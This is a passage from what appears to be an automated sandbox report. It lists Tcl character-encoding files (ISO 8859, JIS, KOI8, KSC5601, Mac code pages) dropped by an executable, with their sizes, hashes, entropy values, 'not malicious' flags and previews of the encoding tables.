SHA-512:	CB5D8C5E807A72F35AD4E7DA80882F348D70052169A7ED5BB585152C2BF628177A2138BD0A982A398A8DF373E1D3E145AD1F6C52485DE57ECBE5A7ED33E13776
Malicious:	false
Preview:	# Encoding file: iso8859-6, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.00A000000000000000A40000000000000000000000000000060C00AD00000000.00000000000000000000000000000000000000000000061B000000000000061F.0000062106220623062406250626062706280629062A062B062C062D062E062F.0630063106320633063406350636063706380639063A00000000000000000000.064006410642064306440645064606470648

C:\Users\user\Desktop\tcl\encoding\iso8859-7.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1094
Entropy (8bit):	3.2933089629252037
Encrypted:	false
SSDEEP:	24:TMyTUmJvRju3ShVbsZiAMiZyb7P4UP1mKUQQSqJWeIDmq:TlgmOEVIwAMiw/PTkKJQSqJWeI1
MD5:	0AF65F8F07F623FA38E2D732400D95CF
SHA1:	D2903B32FEA225F3FB9239E622390A078C8A8FA6
SHA-256:	8FEC7631A69FCF018569EBADB05771D892678790A08E63C05E0007C9910D58A8
SHA-512:	EF03237A030C54E0E20DBA7ED724580C513490B9B3B043C1E885638E7BCE21415CE56C3902EA39689365B12E44194C6BF868C4D9BCBCA8FDC334BE77DA46E24D
Malicious:	false
Preview:	# Encoding file: iso8859-7, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.00A02018201900A30000000000A600A700A800A9000000AB00AC00AD00002015.00B000B100B200B303840385038600B703880389038A00BB038C00BD038E038F.0390039103920393039403950396039703980399039A039B039C039D039E039F.03A003A1000003A303A403A503A603A703A803A903AA03AB03AC03AD03AE03AF.03B003B103B203B303B403B503B603B703B8

C:\Users\user\Desktop\tcl\encoding\iso8859-8.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1094
Entropy (8bit):	2.9730608214144323
Encrypted:	false
SSDEEP:	24:uTUmJvRju3ShVbsZiAMiZyb7P4UPtePly0b:ugmOEVIwAMiw/PTtw
MD5:	45E35EFF7ED2B2DF0B5694A2B639FE1E
SHA1:	4EA5EC5331541EDE65A9CF601F5418FD4B6CFCBC
SHA-256:	E1D207917AA3483D9110E24A0CC0CD1E0E5843C8BFC901CFEE7A6D872DD945A9
SHA-512:	527283C9EFF2C1B21FAE716F5DFB938D8294B22938C76A73D88135312FA01B5C3DF288461CCE8B692928B334A28A7D29319F9F48733174C898F41BD1BEB8E862
Malicious:	false
Preview:	# Encoding file: iso8859-8, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.00A0000000A200A300A400A500A600A700A800A900D700AB00AC00AD00AE00AF.00B000B100B200B300B400B500B600B700B800B900F700BB00BC00BD00BE0000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000002017.05D005D105D205D305D405D505D605D705D8

C:\Users\user\Desktop\tcl\encoding\iso8859-9.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1094
Entropy (8bit):	3.1865263857127375
Encrypted:	false
SSDEEP:	24:XTUmJvRju3ShVbsZiAMiZyb7P4UPvvPNNAkKMH+tZL/M:XgmOEVIwAMiw/PTvokKzR0
MD5:	675C89ECD212C8524B1875095D78A5AF
SHA1:	F585C70A5589DE39558DAC016743FF85E0C5F032
SHA-256:	1CDCF510C38464E5284EDCFAEC334E3FC516236C1CA3B9AB91CA878C23866914
SHA-512:	E620657C5F521A101B6FF7B5FD9A7F0DDD560166BA109D20E91F2E828F81697F897DFA136533C0D6F24A9861E92F34C0CC0FA590F344713C089157F8AC3ECFE2
Malicious:	false
Preview:	# Encoding file: iso8859-9, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF.00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF.00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF.011E00D100D200D300D400D500D600D700D800D900DA00DB00DC0130015E00DF.00E000E100E200E300E400E500E600E700E8

C:\Users\user\Desktop\tcl\encoding\jis0201.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1092
Entropy (8bit):	3.1984111069807395
Encrypted:	false
SSDEEP:	24:zBTUmJvRju3ShVbsZiAMiZyb7PN8pUPnfk5JM0RHFj:zBgmOEVIwAMiw/PNPQPFj
MD5:	0DCB64ACBB4B518CC20F4E196E04692C
SHA1:	7AEB708C89C178FB4D5611C245EA1A7CF66ADF3A
SHA-256:	480F61D0E1A75DEE59BF9A66DE0BB78FAAE4E87FD6317F93480412123277D442
SHA-512:	4AFA210763DE9742626886D7D281AC15169CDC7A31D185F48D105190CA247AA014FB8F281AFCB4A0C31D2D55EE7D907B6A8E51FC4BEEDB9DB8C484E88CAA78A9
Malicious:	false
Preview:	# Encoding file: jis0201, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D203E007F.0080008100820083008400850086008700880089008A008B008C008D008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F.FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F.FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F.FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F.00000000000000000000000000000000000000

C:\Users\user\Desktop\tcl\encoding\jis0208.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	80459
Entropy (8bit):	2.275449965317654
Encrypted:	false
SSDEEP:	384:R7Cyeug/RAEo7umlshyGYknyRXglMVw9bq7bYI45zh2cvA3FXwhZ1BrUc2C5oS52:RgZJo7uNhbyO1ZiEXPcXwhZbrUPkBso+
MD5:	D8FD9D54F4497272592666B097384ACF
SHA1:	0F51A031132AF5CEB70D91E8795AD8F934EB0203
SHA-256:	8B3CAD181F3EB88B3E5B168EA48831C58A70DBC8F5DB37DF504E0FFD8B5AB985
SHA-512:	604084AF969C6426DEF4061EEF0C0E267B43AF25AE9F200164342F02CDE8931B0A2AAB46E42D0FAABEDE3AFFE23F993D3EBB76C560236434765A4A1FC7FB5A82
Malicious:	false
Preview:	# Encoding file: jis0208, double-byte.D.2129 0 77.21.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000300030013002FF0CFF0E30FBFF1AFF1BFF1FFF01309B309C00B4FF4000A8.FF3EFFE3FF3F30FD30FE309D309E30034EDD30053006300730FC20152010FF0F.FF3C301C2016FF5C2026202520182019201C201DFF08FF0930143015FF3BFF3D.FF5BFF5D30083009300A300B300C300D300E300F30103011FF0B221200B100D7.00F7FF1D2260FF1CFF1E22662267221E22342642264000B0203220332103FFE5.FF0400A200A3FF05FF03FF06FF0AFF2000A72606260525CB25CF25CE25C70000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000

C:\Users\user\Desktop\tcl\encoding\jis0212.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	70974
Entropy (8bit):	2.2631380488363284
Encrypted:	false
SSDEEP:	768:WmU4+qNPpEzjKgGWJACVeCssX2Qt5E2+G7PBIv:LU4+qNaCgGW7VGK2o+0qv
MD5:	F518436AC485F5DC723518D7872038E0
SHA1:	15013478760463A0BCE3577B4D646ECDB07632B5
SHA-256:	24A9D379FDA39F2BCC0580CA3E0BD2E99AE279AF5E2841C9E7DBE7F931D19CC0
SHA-512:	2325705D4772A10CD81082A035BEAC85E6C64C7CCFA5981955F0B85CAF9A95D8A0820092957822A05C2E8E773F2089035ED5E76BF3FAF19B0E7E6AED7B4214D8
Malicious:	false
Preview:	# Encoding file: jis0212, double-byte.D.2244 0 68.22.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.00000000000000000000000000000000000000000000000000000000000002D8.02C700B802D902DD00AF02DB02DA007E03840385000000000000000000000000.0000000000A100A600BF00000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000BA00AA00A900AE2122.00A4211600000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000

C:\Users\user\Desktop\tcl\encoding\koi8-r.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1091
Entropy (8bit):	3.463428231669408
Encrypted:	false
SSDEEP:	24:KcJ5mTUmJvRju3ShVbsZiAMiZyb7PcSzm1XvRS3YcmchJQ3MAxSy:KmmgmOEVIwAMiw/Ptz8gBmRcAx5
MD5:	E66D42CB71669CA0FFBCDC75F6292832
SHA1:	366C137C02E069B1A93FBB5D64B9120EA6E9AD1F
SHA-256:	7142B1120B993D6091197574090FE04BE3EA64FFC3AD5A167A4B5E0B42C9F062
SHA-512:	6FBF7AF0302B4AA7EF925EFED7235E946EDA8B628AA204A8BBB0A3D1CB8C79DD37D9DD92A276AD14B55776FEBB3B55CF5881AC4013F95ED4E618E3B49771E8A5
Malicious:	false
Preview:	# Encoding file: koi8-r, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.25002502250C251025142518251C2524252C2534253C258025842588258C2590.259125922593232025A02219221A22482264226500A0232100B000B200B700F7.25502551255204512553255425552556255725582559255A255B255C255D255E.255F25602561040125622563256425652566256725682569256A256B256C00A9.044E0430043104460434043504440433044504380439043A043B043C043D043E.043F044F044004410442044304360432044C044B04370448044D04490447044A.042E04100411042604140415042404130425041

C:\Users\user\Desktop\tcl\encoding\koi8-u.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1091
Entropy (8bit):	3.439504497428066
Encrypted:	false
SSDEEP:	24:K+TUmJvRju3ShVbsZiAMiZyb7PcSzmn3gXDRS3YcmchJQ3MAxSy:K+gmOEVIwAMiw/Ptz0KgBmRcAx5
MD5:	D722EFEA128BE671A8FDA45ED7ADC586
SHA1:	DA9E67F64EC4F6A74C60CB650D5A12C4430DCFF7
SHA-256:	BBB729B906F5FC3B7EE6694B208B206D19A9D4DC571E235B9C94DCDD4A323A2A
SHA-512:	FDF183C1A0D9109E21F7EEBC5996318AEDED3F87319A980C4E96BFE1D43593BDB693D181744C5C7E391A849783E3594234060A9F76116DE56F9592EF95979E63
Malicious:	false
Preview:	# Encoding file: koi8-u, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.25002502250C251025142518251C2524252C2534253C258025842588258C2590.259125922593232025A02219221A22482264226500A0232100B000B200B700F7.25502551255204510454255404560457255725582559255A255B0491255D255E.255F25602561040104032563040604072566256725682569256A0490256C00A9.044E0430043104460434043504440433044504380439043A043B043C043D043E.043F044F044004410442044304360432044C044B04370448044D04490447044A.042E04100411042604140415042404130425041

C:\Users\user\Desktop\tcl\encoding\ksc5601.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	92877
Entropy (8bit):	2.32911747373862
Encrypted:	false
SSDEEP:	768:XtWS2ymX62EztZ1Oyxk1uGtQPUNg0q+6XVfEFh:XtWnzEn1HxRQQPV0Eeh
MD5:	599CEA614F5C5D01CDFA433B184AA904
SHA1:	C2FFA427457B4931E5A92326F251CD3D671059B0
SHA-256:	0F8B530AD0DECBF8DD81DA8291B8B0F976C643B5A292DB84680B31ECFBE5D00A
SHA-512:	43D24B719843A21E3E1EDDFC3607B1B198542306C2EC8D621188CD39BA913D23678D39D12D8370CC1CE12828661AF0A5F14AD2B2BF99F62387C5E3E365BA1E75
Malicious:	false
Preview:	# Encoding file: ksc5601, double-byte.D.233F 0 89.21.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.000030003001300200B72025202600A8300300AD20152225FF3C223C20182019.201C201D3014301530083009300A300B300C300D300E300F3010301100B100D7.00F7226022642265221E223400B0203220332103212BFFE0FFE1FFE526422640.222022A52312220222072261225200A7203B2606260525CB25CF25CE25C725C6.25A125A025B325B225BD25BC219221902191219321943013226A226B221A223D.221D2235222B222C2208220B2286228722822283222A222922272228FFE20000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000

C:\Users\user\Desktop\tcl\encoding\macCentEuro.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1096
Entropy (8bit):	3.3601842107710365
Encrypted:	false
SSDEEP:	24:8jTUmJvRju3ShVbsZiAMiZyb7P4ZVPJS82WcVDX1MPEd4RPMppJ8K:8jgmOEVIwAMiw/PsVoy24VMppiK
MD5:	CADFBF5A4C7CAD984294284D643E9CA3
SHA1:	16B51D017001688A32CB7B15DE6E7A49F28B76FD
SHA-256:	8F3089F4B2CA47B7AC4CB78375B2BFAC01268113A7C67D020F8B5B7F2C25BBDA
SHA-512:	3941ACA62CF59BF6857BA9C300B4236F18690DE1213BB7FCFA0EC87DCD71152849F1DEAFB470CA4BC2ACC2C0C13D7FD57661BFC053960ADD7570DE365AE7E63C
Malicious:	false
Preview:	# Encoding file: macCentEuro, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C40100010100C9010400D600DC00E10105010C00E4010D0106010700E90179.017A010E00ED010F01120113011600F3011700F400F600F500FA011A011B00FC.202000B0011800A300A7202200B600DF00AE00A92122011900A822600123012E.012F012A22642265012B0136220222110142013B013C013D013E0139013A0145.0146014300AC221A01440147220600AB00BB202600A00148015000D50151014C.20132014201C201D2018201900F725CA014D0154015501582039203A01590156.01570160201A201E0161015A015B00C101

C:\Users\user\Desktop\tcl\encoding\macCroatian.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1096
Entropy (8bit):	3.3293096097500965
Encrypted:	false
SSDEEP:	24:8ULyTUmJvRju3ShVbsZiAMiZyb7P4SNMdNxOZwl+KR8DklJyseQWkv:8ULygmOEVIwAMiw/P34+KR8DklEswm
MD5:	F13D479550D4967A0BC76A60C89F1461
SHA1:	63F44E818284384DE07AB0D8B0CD6F7EBFE09AB9
SHA-256:	8D0B6A882B742C5CCE938241328606C111DDA0CB83334EBEDCDA17605F3641AE
SHA-512:	80AB9DCAAC1A496FD2CA6BE9959FE2DE201F504D8A58D114F2FF5D1F6AAD507F052B87D29D3EBA69093C3D965CC4C113C9EA6DB8EEBB67BD620ADF860CA2CC35
Malicious:	false
Preview:	# Encoding file: macCroatian, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.202000B000A200A300A7202200B600DF00AE0160212200B400A82260017D00D8.221E00B122642265220600B522022211220F0161222B00AA00BA03A9017E00F8.00BF00A100AC221A01922248010600AB010C202600A000C000C300D501520153.01102014201C201D2018201900F725CAF8FF00A9204420AC2039203A00C600BB.201300B7201A201E203000C2010700C101

C:\Users\user\Desktop\tcl\encoding\macCyrillic.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1096
Entropy (8bit):	3.3482225358368565
Encrypted:	false
SSDEEP:	24:8dTUmJvRju3ShVbsZiAMiZyb7P4GE+SAJlM9aDpiR/Pk956e3cmh:8dgmOEVIwAMiw/Pr5NY3k9nsmh
MD5:	60FFC8E390A31157D8646AEAC54E58AE
SHA1:	3DE17B2A5866272602FB8E9C54930A4CD1F3B06C
SHA-256:	EB135A89519F2E004282DED21B11C3AF7CCB2320C9772F2DF7D1A4A1B674E491
SHA-512:	3644429A9BD42ADC356E1BD6FCFABEE120E851348B538A4FE4903B72A533174D7448A6C2DA71219E4CD5D0443C0475417D54C8E113005DF2CA20C608DE5E3306
Malicious:	false
Preview:	# Encoding file: macCyrillic, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0410041104120413041404150416041704180419041A041B041C041D041E041F.0420042104220423042404250426042704280429042A042B042C042D042E042F.202000B0049000A300A7202200B6040600AE00A9212204020452226004030453.221E00B122642265045600B504910408040404540407045704090459040A045A.0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455.20132014201C201D2018201900F7201E040E045E040F045F211604010451044F.0430043104320433043404350436043704

C:\Users\user\Desktop\tcl\encoding\macDingbats.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1096
Entropy (8bit):	3.8086748658227827
Encrypted:	false
SSDEEP:	24:87JM0UmJvRjuyfqYCsUBOdXBCbtwHviANskNWkiXFtoE4OSFgHrBPkq:87KfmOEqYCs6CXRPiANHWkiXFt9XSMdf
MD5:	EBD121A4E93488A48FC0A06ADE9FD158
SHA1:	A40E6DB97D6DB2893A072B2275DC22E2A4D60737
SHA-256:	8FBCC63CB289AFAAE15B438752C1746F413F3B79BA5845C2EF52BA1104F8BDA6
SHA-512:	26879ABE4854908296F32B2BB97AEC1F693C56EC29A7DB9B63B2DA62282F2D2EDAE9D50738595D1530731DF5B1812719A74F50ADF521F80DD5067F3DF6A3517C
Malicious:	false
Preview:	# Encoding file: macDingbats, single-byte.S.003F 1 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.00202701270227032704260E2706270727082709261B261E270C270D270E270F.2710271127122713271427152716271727182719271A271B271C271D271E271F.2720272127222723272427252726272726052729272A272B272C272D272E272F.2730273127322733273427352736273727382739273A273B273C273D273E273F.2740274127422743274427452746274727482749274A274B25CF274D25A0274F.27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F.F8D7F8D8F8D9F8DAF8DBF8DCF8DDF8DEF8DFF8E0F8E1F8E2F8E3F8E4008E008F.0090009100920093009400950096009700980099009A009B009C009D009E009F.0000276127622763276427652766276726632666266526602460246124622463.2464246524662467246824692776277727782779277A277B277C277D277E277F.2780278127822783278427852786278727882789278A278B278C278D278E278F.2790279127922793279421922194219527982799279A279B279C279D279E279F.27A027A127A227A327A427A527A627A727

C:\Users\user\Desktop\tcl\encoding\macGreek.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1093
Entropy (8bit):	3.4271472017271556
Encrypted:	false
SSDEEP:	24:8dOTUmJvRju3ShVbsZiAMiZyb7P4Hlb7BMM2aSYjsSkUEkp1FsOSUTime:8kgmOEVIwAMiw/Pg7K23s0x1FsOJTime
MD5:	14AD68855168E3E741FE179888EA7482
SHA1:	9C2AD53D69F5077853A05F0933330B5D6F88A51C
SHA-256:	F7BFF98228DED981EC9A4D1D0DA62247A8D23F158926E3ACBEC3CCE379C998C2
SHA-512:	FB13F32197D3582BC20EEA604A0B0FD7923AE541CCEB3AF1CDE36B0404B8DB6312FB5270B40CBC8BA4C91B9505B57FB357EB875E8AFB3DB76DFB498CE17851ED
Malicious:	false
Preview:	# Encoding file: macGreek, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400B900B200C900B300D600DC038500E000E200E4038400A800E700E900E8.00EA00EB00A3212200EE00EF202200BD203000F400F600A600AD00F900FB00FC.2020039303940398039B039E03A000DF00AE00A903A303AA00A7226000B000B7.039100B12264226500A503920395039603970399039A039C03A603AB03A803A9.03AC039D00AC039F03A1224803A400AB00BB202600A003A503A7038603880153.20132015201C201D2018201900F70389038A038C038E03AD03AE03AF03CC038F.03CD03B103B203C803B403B503C603B303B70

C:\Users\user\Desktop\tcl\encoding\macIceland.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1095
Entropy (8bit):	3.3292041026777457
Encrypted:	false
SSDEEP:	24:8KTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdjY4g4JysAWD:8KgmOEVIwAMiw/Pf2YRMFBEszD
MD5:	6D52A84C06970CD3B2B7D8D1B4185CE6
SHA1:	C434257D76A9FDF81CCCD8CC14242C8E3940FD89
SHA-256:	633F5E3E75BF1590C94AB9CBF3538D0F0A7A319DB9016993908452D903D9C4FD
SHA-512:	711F4DC86DD609823BF1BC5505DEE9FA3875A8AA7BCA31DC1B5277720C5ABE65B62E8A592FC55D99D1C7CA181FDDC2606551C43A9D12489B9FECFF152E9A3DCF
Malicious:	false
Preview:	# Encoding file: macIceland, single-byte.S.003F 0 1.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8.00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC.00DD00B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8.221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8.00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153.20132014201C201D2018201900F725CA00FF0178204420AC00D000F000DE00FE.00FD00B7201A201E203000C200CA00C100C

C:\Users\user\Desktop\tcl\encoding\macJapan.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	48028
Entropy (8bit):	3.3111639331656635
Encrypted:	false
SSDEEP:	768:ehuW1PJnT9TO7RaQiPCLUKr7KBi9FrOLdtHJ:eZPV9KuqTxFGXp
MD5:	105B49F855C77AE0D3DED6C7130F93C2
SHA1:	BA187C52FAE9792DA5BFFBEAA781FD4E0716E0F6
SHA-256:	2A6856298EC629A16BDD924711DFE3F3B1E3A882DDF04B7310785D83EC0D566C
SHA-512:	5B5FBE69D3B67AF863759D92D4A68481EC2211FF84ED9F0B3BD6129857966DE32B42A42432C44B9246C9D0D9C4C546CD3C6D13FF49BD338192C24AD053C0602E
Malicious:	false
Preview:	# Encoding file: macJapan, multi-byte.M.003F 0 46.00.0000000100020003000400050006000700080009000A000B000C000D000E000F.0010001100120013001400150016001700180019001A001B001C001D001E001F.0020002100220023002400250026002700280029002A002B002C002D002E002F.0030003100320033003400350036003700380039003A003B003C003D003E003F.0040004100420043004400450046004700480049004A004B004C004D004E004F.0050005100520053005400550056005700580059005A005B005C005D005E005F.0060006100620063006400650066006700680069006A006B006C006D006E006F.0070007100720073007400750076007700780079007A007B007C007D007E007F.0080000000000000000000000000000000000000000000000000000000000000.0000000000000000000000000000000000000000000000000000000000000000.00A0FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F.FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F.FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F.FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F.0000000000000000000000000000000000000

C:\Users\user\Desktop\tcl\encoding\macRoman.enc Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1093
Entropy (8bit):	3.3361385497578406
Encrypted:	false
SSDEEP:	24:8TTUmJvRju3ShVbsZiAMiZyb7P4SNMVtOZm5YRMdjBtRg4JysAWD:8TgmOEVIwAMiw/P32YRMTtRBEszD
MD5:	30BECAE9EFD678B6FD1E08FB952A7DBE
SHA1:	E4D8EA6A0E70BB793304CA21EB1337A7A2C26A31
